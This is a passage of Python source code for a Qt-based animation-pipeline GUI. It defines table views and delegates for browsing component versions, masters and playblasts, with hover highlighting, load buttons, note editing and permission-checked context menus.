        index = self.indexAt(button.pos())
        index = self.model().mapToSource(index)
        project = self.model().sourceModel().getNode(index)
        project.link()
        self.model().sourceModel().reset()
        self.viewport().repaint()
    # def asModelIndex(self, index):
    # return self.proxyModel.mapToSource(index)
    #
    # def asModelNode(self, index):
    # return self.sourceModel.getNode(index)
    def contextMenuEvent(self, event):
        # Context menu with an "Explore..." action for the project under the
        # cursor; no menu is shown when the click is not on a row.
        handled = True
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        node = None
        if index.isValid():
            src = self._proxyModel.mapToSource(index)
            node = self._proxyModel.sourceModel().getNode(src)
        def_actions = list()
        if node:
            def_actions.append(QtWidgets.QAction("Explore...", menu,
                                                 triggered=functools.partial(self.explore, node)))
        else:
            event.accept()
            return
        menu.addActions(def_actions)
        menu.exec_(event.globalPos())
        event.accept()
        return
    def explore(self, node):
        # Open the project's location in the system file browser.
        node.explore()
    def dummy(self):
        # Intentional no-op: used as the click handler for "Online" buttons.
        pass
class Run_scripts_View(QtWidgets.QTableView):
    """Two-column table of runnable scripts.

    Column 0 (script name) stretches; column 1 (action) is fixed at 80px.
    Rows are selected as a whole and the vertical header is hidden.
    """

    def __init__(self, parent=None):
        super(Run_scripts_View, self).__init__(parent)
        self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
        self.verticalHeader().setHidden(True)

    def setModel(self, model=None):
        super(Run_scripts_View, self).setModel(model)
        header = self.horizontalHeader()
        QtCompat.setSectionResizeMode(header, 0, QtWidgets.QHeaderView.Stretch)
        header.resizeSection(1, 80)
        QtCompat.setSectionResizeMode(header, 1, QtWidgets.QHeaderView.Fixed)
# self.horizontalHeader().setStretchLastSection(False)
# QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Fixed)
# self.setItemDelegateForColumn(2, RoleComboBoxDelegate(self))
#
# QtCompat.setSectionResizeMode(self.horizontalHeader(), QtWidgets.QHeaderView.Stretch)
# self.setEditTriggers(QtWidgets.QAbstractItemView.AllEditTriggers)
# def contextMenuEvent(self, event):
#
# index = self.indexAt(event.pos())
# menu = QtWidgets.QMenu()
#
# actions = []
# actions.append(QtWidgets.QAction("New user", menu, triggered=functools.partial(self.new_user, index)))
# actions.append(QtWidgets.QAction("Import users from a json file", menu, triggered=self.import_users))
#
# if index.isValid():
# actions.append(QtWidgets.QAction("Remove user", menu, triggered=functools.partial(self.remove_user, index)))
# menu.addActions(actions)
#
# menu.exec_(event.globalPos())
# event.accept() # TELL QT IVE HANDLED THIS THING
# return
# def remove_user(self, index):
# row = index.row()
# parent = index.parent()
# self.model().removeRows(row, 1, parent)
#
# def new_user(self, index):
# user = dt.UserNode("New user", "1234", cfg._admin_)
# if index.isValid():
# row = index.row()
# else:
# row = len(self.model().items)
#
# self.model().insertRows(row + 1, 1, QtCore.QModelIndex(), node=user)
#
# def import_users(self):
# path = QtWidgets.QFileDialog.getOpenFileName(self, "Select the users file", filter="json files (*.json)")
# if path[0]:
# users_file = serializer.JSONSerializer(path=str(path[0]))
# users_file = users_file.read()
# print users_file, "="
# self.setModel(None)
# users = []
# for key in users_file:
# users.append(dt.UserNode(key, users_file[key][0], users_file[key][1]))
#
# if users:
# self.setModel(models.Users_Model(users))
class HoverDelegate(QtWidgets.QStyledItemDelegate):
    """Styled-item delegate that highlights the row under the mouse.

    The owning view feeds row changes into hover_signal_change(); hovered
    cells are filled gray and their text drawn in black, all other cells use
    the default styled painting.
    """

    def __init__(self, parent):
        # Parent is required so the owning view can wire its hover signal.
        QtWidgets.QStyledItemDelegate.__init__(self, parent)
        self.hovered_row = -1  # -1 means no row is hovered

    def hover_signal_change(self, row):
        # Slot: remember which row the cursor is currently over.
        self.hovered_row = row

    def paint(self, painter, option, index):
        if index.row() != self.hovered_row:
            # Not hovered: default styled rendering.
            QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
            return
        painter.save()
        painter.fillRect(option.rect, QtGui.QColor('#646464'))
        painter.setBrush(QtGui.QColor('#000'))
        painter.setPen(QtGui.QColor("#000000"))
        text = index.data(QtCore.Qt.DisplayRole)
        text = str(text) if text else ''
        # Small offset so the text clears the cell border.
        painter.translate(5, 8)
        painter.drawText(option.rect, QtCore.Qt.AlignLeft, text)
        painter.restore()
class loadButtonDelegate(QtWidgets.QItemDelegate):
    """
    A delegate that places a fully functioning QPushButton in every
    cell of the column to which it's applied.

    The button icon depends on the node type (new / playblast / version /
    master) and hover events from the buttons are forwarded back to the
    owning view so row highlighting keeps working over the widgets.
    """

    def __init__(self, parent):
        # The parent is not an optional argument for the delegate as
        # we need to reference it in the paint method (see below)
        QtWidgets.QItemDelegate.__init__(self, parent)
        self.hovered_row = -1  # -1 means no row is hovered

    def hover_signal_change(self, row):
        # Slot fed by the owning view's hover signal.
        self.hovered_row = row

    def eventFilter(self, sender, event):
        """Forward hover-related events from the cell buttons to the view."""
        if event.type() == QtCore.QEvent.Leave:
            self.parent().hover_signal.emit(-1)
            return True
        # Fix: the original compared event.type() (an enum value) against the
        # QMouseEvent *class*, which can never be equal, so mouse moves over
        # the buttons were silently dropped and hover tracking broke.
        if event.type() == QtCore.QEvent.MouseMove:
            self.parent().mouseMoveEvent(event)
            return True
        return False

    def paint(self, painter, option, index):
        # Called every time a cell is (re)painted. Highlight the hovered row,
        # then lazily create and install the cell's button the first time the
        # cell comes into view; afterwards the index widget paints itself.
        if index.row() == self.hovered_row:
            painter.fillRect(option.rect, QtGui.QColor('#646464'))
        if self.parent().indexWidget(index):
            return
        soure_index = self.parent().model().mapToSource(index)
        node = self.parent().model().sourceModel().getNode(soure_index)
        # Fix: default label/icon so an unrecognized node type cannot leave
        # them unbound (the original raised NameError in that case).
        label = ""
        icon = ""
        node_type = node.typeInfo()
        if node_type == cfg._new_:
            icon = cfg.new_icon
        if node_type == cfg._playblast_:
            icon = cfg.play_icon
        if node_type == cfg._version_ or node_type == cfg._master_:
            icon = node.status_icon
        button = QtWidgets.QPushButton(
            label,
            self.parent(),
            clicked=self.parent().MultiButtonClicked
        )
        button.setIconSize(QtCore.QSize(20, 20))
        button.setMouseTracking(True)
        button.setAttribute(QtCore.Qt.WA_Hover, True)
        button.installEventFilter(self)
        # The original first applied cfg.table_button_stylesheet and then
        # immediately overwrote it with this local sheet; only the effective
        # one is kept.
        table_button_stylesheet = '''
        QPushButton{
        border: 0px none;
        border-radius: 0px;
        border-bottom: 1px solid #555555;
        background-color: transparent;
        }
        QPushButton::hover {
        background-color: #808080;
        }
        QPushButton::pressed {
        background-color: #484848;
        }
        '''
        button.setStyleSheet(table_button_stylesheet)
        button.setIcon(QtGui.QIcon(icon))
        self.parent()._buttons.append(button)
        self.parent().setIndexWidget(index, button)
class Library_delegate(QtWidgets.QItemDelegate):
    """
    A delegate that places a fully functioning QPushButton in every
    cell of the column to which it's applied.

    Each cell gets a load button wired to the view's MultiButtonClicked slot.
    """

    def __init__(self, parent):
        # The parent is not an optional argument for the delegate as
        # we need to reference it in the paint method (see below)
        QtWidgets.QItemDelegate.__init__(self, parent)

    def paint(self, painter, option, index):
        # Lazily create and install the cell's button the first time the cell
        # is painted; afterwards the index widget paints itself.
        # (The original also computed mapToSource(index) here, but the result
        # was never used -- the dead computation has been removed.)
        if not self.parent().indexWidget(index):
            button = QtWidgets.QPushButton(
                "",  # icon-only button
                self.parent(),
                clicked=self.parent().MultiButtonClicked
            )
            button.setIconSize(QtCore.QSize(20, 20))
            button.setStyleSheet(cfg.table_button_stylesheet)
            button.setIcon(QtGui.QIcon(cfg.load_icon))
            self.parent()._buttons.append(button)
            self.parent().setIndexWidget(index, button)
class Preset_generator_table_Delegate(QtWidgets.QItemDelegate):
    """Delegate for preset-generator tables.

    Columns above index 2 are edited with a bounded spin box (0-999); the
    rest use a line edit whose text is validated against special characters.
    paint() underlines each cell, with a purple hint for unfilled ASK_USER
    cells.
    """

    def __init__(self, parent):
        # The parent is not an optional argument for the delegate as
        # we need to reference it in the paint method (see below)
        QtWidgets.QItemDelegate.__init__(self, parent)

    def createEditor(self, parent, option, index):
        if index.column() > 2:
            editor = QtWidgets.QSpinBox(parent)
            editor.setMinimum(0)
            editor.setMaximum(999)
        else:
            editor = QtWidgets.QLineEdit(parent)
        return editor

    def setEditorData(self, editor, index):
        # Fix: query the model once instead of three times, and treat
        # None/'' as empty so int()/setText() cannot blow up on missing data.
        raw = index.model().data(index, QtCore.Qt.EditRole)
        if index.column() > 2:
            editor.setValue(int(raw) if raw not in (None, '') else 0)
        else:
            editor.setText(raw if raw is not None else '')

    def setModelData(self, editor, model, index):
        if index.column() > 2:
            editor.interpretText()
            model.setData(index, editor.value(), QtCore.Qt.EditRole)
        else:
            value = editor.text()
            if misc.validation_no_special_chars(value):
                model.setData(index, value, QtCore.Qt.EditRole)
            else:
                # Store a visible sentinel so the user notices the rejection.
                model.setData(index, 'NO_SPECIAL_CHARS', QtCore.Qt.EditRole)

    def paint(self, painter, option, index):
        painter.save()
        input_type = index.data(200)  # custom role carrying the input type
        value = str(index.data(QtCore.Qt.EditRole))
        # Base separator line under every cell.
        painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_GRAY_minus), 0.5))
        painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        if input_type == cfg.Hierarcy_options.ASK_USER and value == '':
            # Unfilled ask-user cell: purple hint line.
            painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.LIGHT_PURPLE), 0.5))
            painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        if input_type == cfg.Hierarcy_options.ASK_USER and value != '':
            # Filled ask-user cell: darker line.
            painter.setPen(QtGui.QPen(QtGui.QColor(cfg.colors.DARK_GRAY_MINUS), 0.5))
            painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
        painter.setPen(QtGui.QPen(QtCore.Qt.white))
        # Small offset so the text clears the cell border.
        painter.translate(5, 8)
        painter.drawText(option.rect, QtCore.Qt.AlignLeft, value)
        painter.restore()
class Standard_table_Delegate(QtWidgets.QItemDelegate):
    """Plain item delegate kept as a named hook for standard table columns.

    Behaves exactly like QItemDelegate; the mandatory parent gives any future
    paint logic a handle back to the owning view.
    """

    def __init__(self, parent):
        super(Standard_table_Delegate, self).__init__(parent)
#
# def paint(self, painter, option, index):
# # set background color
# # painter.setPen(QtWidgets.QPen(QtCore.Qt.NoPen))
# # if option.state & QStyle.State_Selected:
# # painter.setBrush(QBrush(Qt.red))
# # else:
# painter.save()
# role = index.data(200)
# value = index.data(QtCore.Qt.EditRole)
# value = str(value)
# if role == cfg.Hierarcy_options.ASK_USER and value == '':
# painter.setPen(QtWidgets.QPen(QtGui.QColor(cfg.colors.LIGHT_PURPLE_plus), 3.0))
# painter.drawRect(option.rect)
#
# if role == cfg.Hierarcy_options.ASK_USER and value != '':
# painter.setPen(QtWidgets.QPen(QtGui.QColor(cfg.colors.LIGHT_PURPLE), 3.0))
# painter.drawRect(option.rect)
#
# painter.setPen(QtWidgets.QPen(QtCore.Qt.white))
#
# painter.translate(5, 8)
# painter.drawText(option.rect, QtCore.Qt.AlignLeft, value)
#
# painter.restore()
# painter.save()
#
# # set background color
# painter.setPen(QPen(Qt.NoPen))
# if option.state & QStyle.State_Selected:
# painter.setBrush(QColor("#3399FF"))
# else:
# painter.setBrush(QBrush(Qt.white))
# painter.drawRect(option.rect)
#
# # set text color
# value = index.data(Qt.DisplayRole)
# if option.state & QStyle.State_Selected:
# painter.setPen(QPen(Qt.white))
# else:
# painter.setPen(QPen(Qt.black))
#
# # Left indent
# painter.translate(3, 0)
#
# painter.drawText(option.rect, Qt.AlignLeft, value)
#
# painter.restore()
# super(Standard_table_Delegate, self).paint(painter, option, index)
# return
# logger.info("working....")
# painter.save()
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# painter.restore()
# if not self.parent().indexWidget(index):
#
# if self.parent().model().data(index, QtCore.Qt.DecorationRole):
# super(Standard_table_Delegate, self).paint(painter, option, index)
#
# else:
# # node = self.parent().model().sourceModel().getNode(soure_index)
# label = QtWidgets.QLabel((str(self.parent().model().data(index, QtCore.Qt.DisplayRole))))
# label.setMargin(5)
# self.parent().setIndexWidget(index, label)
# def paint(self, painter, option, index):
#
# # super(Standard_table_Delegate, self).paint(painter, option, index)
# # return
# # logger.info("working....")
# # painter.save()
# painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
# painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
# # painter.restore()
#
# if not self.parent().indexWidget(index):
#
# if self.parent().model().data(index, QtCore.Qt.DecorationRole):
# super(Standard_table_Delegate, self).paint(painter, option, index)
#
# else:
# # node = self.parent().model().sourceModel().getNode(soure_index)
# label = QtWidgets.QLabel((str(self.parent().model().data(index, QtCore.Qt.DisplayRole))))
# label.setMargin(5)
# self.parent().setIndexWidget(index, label)
# soure_index = self.parent().model().mapToSource(index)
#
# if self.parent().model().sourceModel().data(soure_index, QtCore.Qt.DecorationRole):
# super(Standard_table_Delegate, self).paint(painter, option, index)
# else:
# # node = self.parent().model().sourceModel().getNode(soure_index)
# label = QtWidgets.QLabel((str(self.parent().model().sourceModel().data(soure_index, QtCore.Qt.DisplayRole))))
# label.setMargin(5)
# if self.parent().model().sourceModel().data(soure_index, QtCore.Qt.FontRole):
# label.setFont(self.parent().model().sourceModel().data(soure_index, QtCore.Qt.FontRole))
#
# self.parent().setIndexWidget(index, label)
#
#
#
class NoteDelegate(QtWidgets.QStyledItemDelegate):
    """
    Delegate for the note column of a versions table.

    Paints the row's note text with a hover highlight (driven by the
    owning view's ``hover_signal``) and, instead of embedding an inline
    editor, pops up a modal multiline dialog when the cell is edited.
    """
    def __init__(self, parent):
        # The parent is NOT optional: paint()/createEditor() reach back
        # into the owning view through self.parent().
        super(NoteDelegate, self).__init__(parent)
        # Row index currently under the mouse; -1 means no row hovered.
        self.hovered_row = -1

    def hover_signal_change(self, row):
        """Slot for the view's hover_signal; remember the hovered row."""
        self.hovered_row = row

    def paint(self, painter, option, index):
        """Paint the note cell, highlighting it while its row is hovered."""
        if index.row() == self.hovered_row:
            painter.save()
            painter.fillRect(option.rect, QtGui.QColor('#808080'))  # '#646464'
            painter.setBrush(QtGui.QColor('#000'))
            painter.setPen(QtGui.QColor("#000000"))
            value = index.data(QtCore.Qt.DisplayRole)
            value = str(value) if value else 'Click to edit...'
            # Clip BEFORE drawing so a long note cannot spill into the
            # neighbouring cells.  (Previously the clip rect was set after
            # drawText, where it had no effect.)
            painter.setClipRect(option.rect)
            text_rect = option.rect.adjusted(5, 8, 0, 0)
            painter.drawText(text_rect, QtCore.Qt.AlignLeft, value)
            painter.restore()
        else:
            # Thin separator line under every non-hovered row.
            painter.setPen(QtGui.QColor(cfg.colors.LIGHT_GRAY))
            painter.drawLine(option.rect.bottomLeft(), option.rect.bottomRight())
            QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)

    def createEditor(self, parent, option, index):
        """
        For column 1, open a modal multiline dialog instead of an inline
        editor and, if accepted, write the text back through the source
        model.  Always returns None so Qt never embeds an editor widget.
        """
        if index.column() == 1:
            source_index = self.parent().model().mapToSource(index)
            node = self.parent().model().sourceModel().getNode(source_index)
            note_input = inputs.MultilineInput(plainText=node.note, caption="Save note for {}".format(node.name))
            accepted = note_input.exec_()
            text = note_input.result()
            if accepted == QtWidgets.QDialog.Accepted:
                self.parent().model().sourceModel().setData(source_index, text, role=QtCore.Qt.EditRole)
        return None
class Versions_View(QtWidgets.QTableView):
    """
    Table view listing the versions of the currently selected component.

    The view tracks the row under the mouse cursor and broadcasts it
    through ``hover_signal`` so its delegates (HoverDelegate,
    NoteDelegate, loadButtonDelegate) can repaint the hovered row.
    """
    # Row index under the cursor; -1 is emitted when the cursor leaves.
    hover_signal = QtCore.Signal(int)

    def __init__(self, parentWidget=None, parent=None, settings=None):
        super(Versions_View, self).__init__(parent)
        self.css = loadCSS.loadCSS(os.path.join(os.path.dirname(pipeline.CSS.__file__), 'mainWindow.css'))
        # NOTE(review): despite the default, settings must not be None here
        # -- confirm against callers.
        self.role = settings.current_role
        self.permissions = permissions.Permissions
        self._buttons = []
        # Deliberately shadows QWidget.parent(); the class reads it as an
        # attribute below (self.parent.project, self.parent.current_component).
        self.parent = parent
        self.parentWidget = parentWidget
        self.setWordWrap(True)
        self.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
        self.setSortingEnabled(True)
        self.setShowGrid(False)
        self._proxyModel = None
        self.horizontalHeader().setHidden(True)
        self.verticalHeader().setHidden(True)
        self.setFocusPolicy(QtCore.Qt.NoFocus)
        self.installEventFilter(self)
        self.setMouseTracking(True)
        self.viewport().setAttribute(QtCore.Qt.WA_Hover, True)

    def eventFilter(self, sender, event):
        """Reset the hover highlight when the cursor leaves the view."""
        if event.type() == QtCore.QEvent.Leave:
            self.hover_signal.emit(-1)
            return True
        return False

    def mouseMoveEvent(self, event):
        # Broadcast the hovered row so the delegates can repaint it.
        row = self.indexAt(event.pos()).row()
        self.hover_signal.emit(row)

    def addSlider(self):
        """Attach an icon-scale slider below the view and wire it up."""
        self._slider = IconScaleSlider(self)
        self.parentWidget.layout().addWidget(self._slider)
        self._slider.listSlider.sliderMoved.connect(self.icons_size)
        self.icons_size(32)

    def icons_size(self, size):
        """Resize the icons, the icon column and the row height to ``size`` px.

        (Parameter was previously named ``int``, shadowing the builtin.)
        """
        self.setIconSize(QtCore.QSize(size, size))
        self.horizontalHeader().resizeSection(0, size)
        self.verticalHeader().setDefaultSectionSize(size)
        try:
            self.model().sourceModel()._rowHeight = size
        except AttributeError:
            # No model assigned yet (self.model() is None) -- nothing to update.
            pass

    def clearModel(self):
        """Detach and drop the current proxy/source models.

        The teardown order below works around a PySide2 crash observed
        when simply replacing the model.
        """
        self._buttons = []
        if isinstance(self._proxyModel, (models.Versions_ProxyModel,
                                         models.Masters_ProxyModel,
                                         models.Playblasts_ProxyModel,
                                         models.Simple_ProxyModel)):
            m = self._proxyModel.sourceModel()
            self._proxyModel.setSourceModel(None)
            del m
            self.setModel(None)
            self._proxyModel = None

    def setModel_(self, model=None):
        """Wrap ``model`` in a Versions proxy, then configure columns and delegates."""
        self.clearModel()
        if not model:
            return
        self._proxyModel = models.Versions_ProxyModel()
        self._proxyModel.setSourceModel(model)
        self._proxyModel.setDynamicSortFilter(True)
        self._proxyModel.setSortRole(models.Versions_Model.sortRole)
        self.setModel(self._proxyModel)
        self.proxyModel = self.model()
        self.sourceModel = self.proxyModel.sourceModel()
        # Column layout: 0 icon | 1 note (stretch) | 2 date | 3 size | 4 author | 5 load
        self.horizontalHeader().resizeSection(0, 35)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().setStretchLastSection(False)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
        self.horizontalHeader().resizeSection(2, 100)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(3, 80)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(4, 60)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(5, 32)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
        row_del = HoverDelegate(self)
        note_del = NoteDelegate(self)
        load_del = loadButtonDelegate(self)
        self.hover_signal.connect(row_del.hover_signal_change)
        self.hover_signal.connect(note_del.hover_signal_change)
        self.hover_signal.connect(load_del.hover_signal_change)
        self.setItemDelegate(row_del)
        self.setItemDelegateForColumn(5, load_del)   # load / more-options buttons
        self.setItemDelegateForColumn(1, note_del)   # note column
        self.sortByColumn(0, QtCore.Qt.DescendingOrder)
        self.verticalHeader().setDefaultSectionSize(32)
        # Hide the author column when the active project has no users.
        if not self.parent.project.users:
            self.setColumnHidden(4, True)
        else:
            self.setColumnHidden(4, False)

    def MultiButtonClicked(self):
        """Slot for the per-row load button created by the delegate.

        ``self.sender()`` is the QPushButton itself (not the delegate);
        its position identifies the clicked row.
        """
        button = self.sender()
        index = self.indexAt(button.pos())
        index = self.model().mapToSource(index)
        node = self.model().sourceModel().getNode(index)
        if node.typeInfo() == cfg._new_:
            # "New" placeholder row: create the component's first version.
            node.parent().initialVersion()
            self._proxyModel.invalidate()
        else:
            # Load the clicked version; the return value is not used.
            node.load()

    def contextMenuEvent(self, event):
        """Build the right-click menu for the selected version rows."""
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        node = None
        if index.isValid():
            src = self.asModelIndex(index)
            node = self.asModelNode(src)
            rows = self.selectionModel().selectedRows()
            if rows:
                node = [self.asModelNode(self.asModelIndex(r)) for r in rows]
        actions = list()
        def_actions = list()
        if node:
            if isinstance(node, list):
                # Single-row selection gets the full per-version menu.
                if len(node) == 1:
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.reference_version):
                        actions.append(QtWidgets.QAction("Reference {} into the current scene".format(node[0].fullName), menu, triggered=functools.partial(self.reference_, node)))
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.import_version):
                        actions.append(QtWidgets.QAction("Import {} into the current scene".format(node[0].fullName), menu, triggered=functools.partial(self.import_, node)))
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.delete):
                        actions.append(QtWidgets.QAction("Delete...", menu, triggered=functools.partial(self.delete, node)))
                    def_actions.append(QtWidgets.QAction("Explore...", menu, triggered=functools.partial(self.explore, node)))
            else:
                if self.parent.current_component:
                    pass
        else:
            event.accept()
            return
        menu.addActions(actions)
        menu.addSeparator()
        menu.addActions(def_actions)
        menu.setStyleSheet(self.css)
        menu.exec_(event.globalPos())
        event.accept()
        return

    def delete(self, node):
        """Delete every selected version node after a confirmation prompt."""
        if massage.warning("warning", "Delete", "Are you sure you want to delete these versions?"):
            if isinstance(node, list):
                for n in node:
                    n.delete()
                self.parent.current_component.refresh()

    def explore(self, node):
        """Open the first selected version's location in the file browser."""
        if isinstance(node, list):
            node[0].explore()

    def reference_(self, node):
        """Reference the first selected version into the current scene."""
        if isinstance(node, list):
            node[0].reference_()

    def import_(self, node):
        """Import the first selected version into the current scene."""
        if isinstance(node, list):
            node[0].import_()

    def asModelIndex(self, index):
        """Map a proxy index to the corresponding source-model index."""
        return self.proxyModel.mapToSource(index)

    def asModelNode(self, index):
        """Return the node behind a source-model index."""
        return self.sourceModel.getNode(index)

    @property
    def proxyModel(self):
        """Proxy model currently driving the view (may be None)."""
        return self._proxyModel

    @proxyModel.setter
    def proxyModel(self, model):
        self._proxyModel = model

    @property
    def sourceModel(self):
        """Source model behind the proxy."""
        return self._sourceModel

    @sourceModel.setter
    def sourceModel(self, model):
        self._sourceModel = model
class Masters_View(Versions_View):
    """Versions_View variant listing the master versions of a component."""
    def __init__(self, parentWidget=None, parent=None, settings=None):
        super(Masters_View, self).__init__(parentWidget, parent, settings)

    def setModel_(self, model=None):
        """Wrap ``model`` in a Masters proxy, then configure columns and delegates."""
        self.clearModel()
        if not model:
            return
        self._proxyModel = models.Masters_ProxyModel()
        self._proxyModel.setSourceModel(model)
        self._proxyModel.setDynamicSortFilter(True)
        self._proxyModel.setSortRole(models.Versions_Model.sortRole)
        self.setModel(self._proxyModel)
        self.proxyModel = self.model()
        self.sourceModel = self.proxyModel.sourceModel()
        # Column layout: 0 icon | 1 note (stretch) | 2..5 fixed info | 6 load
        self.horizontalHeader().resizeSection(0, 32)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().setStretchLastSection(False)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
        self.horizontalHeader().resizeSection(2, 60)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(3, 110)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(4, 80)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(5, 60)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(6, 32)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 6, QtWidgets.QHeaderView.Fixed)
        row_del = HoverDelegate(self)
        note_del = NoteDelegate(self)
        load_del = loadButtonDelegate(self)
        self.hover_signal.connect(row_del.hover_signal_change)
        self.hover_signal.connect(note_del.hover_signal_change)
        self.hover_signal.connect(load_del.hover_signal_change)
        self.setItemDelegate(row_del)
        self.setItemDelegateForColumn(6, load_del)   # load / more-options buttons
        self.setItemDelegateForColumn(1, note_del)   # note column
        self.sortByColumn(0, QtCore.Qt.DescendingOrder)
        self.verticalHeader().setDefaultSectionSize(32)
        # Hide the author column when the active project has no users.
        if not self.parent.project.users:
            self.setColumnHidden(4, True)
        else:
            self.setColumnHidden(4, False)
        # Hide the number column for an un-numbered (placeholder) master.
        if model.items[0].number == 0:
            self.setColumnHidden(0, True)
        else:
            self.setColumnHidden(0, False)

    def contextMenuEvent(self, event):
        """Build the right-click menu for the selected master rows."""
        index = self.indexAt(event.pos())
        menu = QtWidgets.QMenu()
        node = None
        if index.isValid():
            src = self.asModelIndex(index)
            node = self.asModelNode(src)
            rows = self.selectionModel().selectedRows()
            if rows:
                node = [self.asModelNode(self.asModelIndex(r)) for r in rows]
        actions = list()
        def_actions = list()
        if node:
            if isinstance(node, list):
                if len(node) == 1:
                    # Value comparison: "is not 0" relied on CPython small-int
                    # caching and raises a SyntaxWarning on Python >= 3.8.
                    if node[0].number != 0:
                        if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.revert_master):
                            actions.append(QtWidgets.QAction("Revert master to {}".format(node[0].fullName), menu, triggered=functools.partial(self.revert_, node)))
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.reference_version):
                        actions.append(QtWidgets.QAction("Reference {} into the current scene".format(node[0].fullName), menu, triggered=functools.partial(self.reference_, node)))
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.import_version):
                        actions.append(QtWidgets.QAction("Import {} into the current scene".format(node[0].fullName), menu, triggered=functools.partial(self.import_, node)))
                    if self.permissions.has_permissions(role_string=self.role(), action=self.permissions.delete):
                        actions.append(QtWidgets.QAction("Delete...", menu, triggered=functools.partial(self.delete, node)))
                    def_actions.append(QtWidgets.QAction("Explore...", menu,
                                                         triggered=functools.partial(self.explore, node)))
            else:
                if self.parent.current_component:
                    pass
        else:
            event.accept()
            return
        menu.addActions(actions)
        menu.addSeparator()
        menu.addActions(def_actions)
        menu.setStyleSheet(self.css)
        menu.exec_(event.globalPos())
        event.accept()
        return

    def revert_(self, node):
        """Ask for confirmation, then revert the master to the selected version."""
        if isinstance(node, list):
            msg = "Are you sure you want to revert your master to {}?".format(node[0].fullName)
            prompt = massage.PromptUser(self, prompt=msg, override_yes_text="Yes", override_no_label="No")
            result = prompt.exec_()
            # PromptUser returns 0 on "Yes".
            if result == 0:
                node[0].revert_()
class Playblasts_View(Versions_View):
    """Versions_View variant listing the playblasts of a component."""
    def __init__(self, parentWidget=None, parent=None, settings=None):
        super(Playblasts_View, self).__init__(parentWidget, parent, settings)

    def setModel_(self, model=None):
        """Wrap ``model`` in a Playblasts proxy, then configure columns and delegates."""
        self.clearModel()
        if not model:
            return
        self._proxyModel = models.Playblasts_ProxyModel()
        self._proxyModel.setSourceModel(model)
        self._proxyModel.setDynamicSortFilter(True)
        self._proxyModel.setSortRole(models.Versions_Model.sortRole)
        self.setModel(self._proxyModel)
        self.proxyModel = self.model()
        self.sourceModel = self.proxyModel.sourceModel()
        # Column layout: 0 icon | 1 note (stretch) | 2..4 fixed info | 5 load
        self.horizontalHeader().resizeSection(0, 32)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 0, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().setStretchLastSection(False)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 1, QtWidgets.QHeaderView.Stretch)
        self.horizontalHeader().resizeSection(2, 110)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 2, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(3, 80)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 3, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(4, 60)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 4, QtWidgets.QHeaderView.Fixed)
        self.horizontalHeader().resizeSection(5, 32)
        QtCompat.setSectionResizeMode(self.horizontalHeader(), 5, QtWidgets.QHeaderView.Fixed)
        row_del = HoverDelegate(self)
        note_del = NoteDelegate(self)
        load_del = loadButtonDelegate(self)
        self.hover_signal.connect(row_del.hover_signal_change)
        self.hover_signal.connect(note_del.hover_signal_change)
        self.hover_signal.connect(load_del.hover_signal_change)
        self.setItemDelegate(row_del)
        self.setItemDelegateForColumn(5, load_del)   # load / more-options buttons
        self.setItemDelegateForColumn(1, note_del)   # note column
        self.sortByColumn(0, QtCore.Qt.DescendingOrder)
        self.verticalHeader().setDefaultSectionSize(32)
        # Hide the author column when the active project has no users.
        if not self.parent.project.users:
            self.setColumnHidden(4, True)
        else:
            self.setColumnHidden(4, False)
        # Hide the number column for an un-numbered (placeholder) playblast.
        if model.items[0].number == 0:
